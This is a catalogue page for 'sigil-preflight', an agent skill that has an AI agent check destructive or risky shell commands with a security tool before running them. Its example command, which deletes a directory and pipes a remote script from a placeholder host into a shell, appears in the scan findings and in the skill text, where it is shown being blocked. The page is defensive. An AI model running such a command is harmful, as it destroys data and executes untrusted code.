Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx agentmods add skills/ju571nk/sigil/openclawnpx skills add Ju571nK/sigil --skill openclawgit clone --depth 1 https://github.com/Ju571nK/sigilWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/skills/ju571nk/sigil/openclaw)<a href="https://agentmods.dev/skills/ju571nk/sigil/openclaw"><img src="https://agentmods.dev/badge/skills/ju571nk/sigil/openclaw.svg" alt="Measured on agentmods" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5 | $0.00046 | $0.00605 |
| Opus 5 | $0.00023 | $0.00302 |
| Sonnet 5 | $0.00009 | $0.00121 |
| Haiku 4.5 | $0.00005 | $0.00060 |
Grade E, and why
sigil-preflight scanned grade E with 3 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 5d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Downloads and executes remote codehighSupply chain
curl | sh runs whatever the server returns today, which is not necessarily what it returned when this was reviewed.
$ sigil assess --command "rm -rf /tmp/build && curl -s http://x/i.sh | sh" Recursive force deletehighDestructive command
rm -rf with a variable or a broad path is one typo away from removing the wrong tree.
$ sigil assess --command "rm -rf /tmp/build && curl -s http://x/i.sh | sh" Makes network callslowCapability
Not a fault in itself. Listed so you know the mod talks to something, and to what.
$ sigil assess --command "rm -rf /tmp/build && curl -s http://x/i.sh | sh" What it actually says
Sigil pre-flight
You have access to Sigil, a security posture tool installed on this machine. Before you execute a shell command that is destructive, privileged, touches credentials/keys, downloads-and-runs code, or that you are otherwise unsure about, you MUST check it with Sigil first.
How to check a command
Run Sigil's assess with the full command line you are about to execute:
sigil assess --command "<the exact command line>"
It prints a one-line JSON verdict and sets an exit code:
- exit code
2→ Sigil says DENY. Do NOT run the command. Tell the user the command was blocked and quote thereasons/deny_matchfrom the JSON. - exit code
0→ allowed (or a warning). Read the JSONdecision:"warn"→ proceed only if the user has explicitly approved; show the reasons."allow"→ proceed.
- exit code
1→ Sigil could not evaluate (no policy / bad input). Treat this as "unknown": fall back to asking the user before running the command.
Example
$ sigil assess --command "rm -rf /tmp/build && curl -s http://x/i.sh | sh"
{"bucket":"Critical","score":9.5,"reasons":[...],"deny_match":{"rule_id":"no-curl-pipe-sh"},"decision":"deny"}
$ echo $?
2
→ exit 2 and "decision":"deny", so you refuse and report the block to the user.
Notes
- Pass the whole command line in
--command(not split), so Sigil sees exactly what the shell will run and its deny-rule check matches what it would enforce. - This skill uses the
sigil assessCLI, which needs no extra setup. For richer, live-policy checks (and to assess MCP server definitions too) you can instead registersigil-mcpas an MCP server in~/.openclaw/openclaw.json(sigil-mcp --print-config openclawprints the block) and call itsassesstool withcommand/argsormcp_server/server_name. - Sigil only reports risk; it never runs or modifies anything.
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 5d ago First seen · 54 lines · 46 tokens per session scan E 8579aa9afa4f
sigil-preflight is a skill published in the GitHub repository Ju571nK/sigil (13 stars, last pushed 11d ago), licensed Apache-2.0. It adds 46 tokens to every session and 605 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it E with 3 findings (downloads and executes remote code, recursive force delete, makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-30.
Other skills, from other repositories
siem-rules
Guides development of SIEM detection rules using KQL (Microsoft Sentinel) and SPL (Splunk) query languages, mapped to MITRE ATT&CK v16 techniques. Auto-invoked when the user needs to write SIEM queries, tune alert thresholds, build correlation rules, or manage the detection rule lifecycle. Produces production-ready…
markdown-formatter
Formats and prettifies markdown documents.
data-processor
Processes data records from a source file.
keyring-reference
Credential store terminology reference.
bugcrowd-reporting
Bugcrowd-specific reporting tactics complementing report-writing: VRT category search-and-fallback strategy when no exact match exists, manual severity override when VRT defaults underrate impact, severity-request paragraph as first body section, OOS-clause rebuttal templates (rate limiting on auth-flow endpoints…
agile-product-owner
../../../product-team/agile-product-owner/skills/agile-product-owner/SKILL.md.